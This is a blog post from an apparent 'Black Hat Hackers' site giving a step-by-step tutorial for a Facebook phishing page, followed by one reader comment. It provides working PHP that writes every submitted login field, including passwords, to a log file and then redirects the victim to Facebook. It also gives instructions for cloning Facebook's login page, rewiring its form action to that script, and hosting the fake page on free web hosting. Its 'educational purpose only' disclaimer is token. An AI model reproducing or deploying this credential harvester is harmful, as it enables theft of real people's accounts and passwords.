z Facebook Phishing | Black Hat Hackers

Facebook Phishing


How to hack Facebook using Phishing Page

last week a person requested here to explain how to make a fake login page of Facebook.. So i am giving a lesson here about making fake page of Facebook.

Note: Hacking is a crime. Dont use this tutorial to hack innocent people. I am teaching it for educational purpose only. I will not be responsible for any damage done by you.

Here we will need 3 types of files for facebook:
1. A php file with any name say login.php. This php file places main role to get the passwords of victim
2. index.html which is a fake html page similar to original Page of Facebook.
3. Photos, CSS, js files 



Step 1. Creating a login.php file>


Open notepad and  paste the following lines there... as save it with name login.php




header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Step 2. Create index.html Page:

2.1. first of all open login page of Facebook.com..... then right click there> save as/save page as> then save it....





check the downloaded file.... there will be
one htm file(Welcome to Facebook.htm)
A folder(Welcome to Facebook_files) containing some pics, css files and js files.(this folder contains 3rd type of files that i hv mentioned above.)




2.2. Now open the htm file with notepad(right click> open with> notepad)...




and then press ctrl +F and search for action... and you will find a line as shown in screenshot.
Note:in case of some other sites may be you find more then one action word... but you have to find out the exact  type of line as shown in screen shot.... near which you will find a
 tag and method="post" something like that.


2.3. Now replace the url written after action with the name of your php file created in step 1



Now your fake page is ready....
Save it with name index.html


Step 3: Uploading on a Free Hosting Site:

step 1: Go to Following link:Visit Site

step 2: Now press the sign up button there... as shown in image below


step 3: Now Fill the details such as ur site name, username, ur valid email id, password etc.
step 4: After fillling ur info click on sign up, now ur account will be created , but your domain is not activated  yet, so to activate it you will got a validation email on your mail id, click the link there, and your domain will be activated. This all procedure can take 24 hours.

  • Note: I came into notice that some of you are not getting domain activation email, in this case check ur spam folder first, possibly it might be der. But still if ur activation mail is not der, then just login with ur username and password by which u have signed up in step 3, then go to tab 'Get Help'.. then click on 'submit a ticket' and write them the issue, and ask them to  activate ur domain. By doing this within 24 hours they will activate ur domain manually :) :)



step 5 : After all done, you will get an email having ur control panel's username, password,, ftp username, password, save it at a secure place, u can require any detail to login on ur free web hosting account.

There are some other free web hosting websites...




3 comments :

it does not work i tried to hack my acount but i didnot get id n pswd in my email or webhost acount

Post a Comment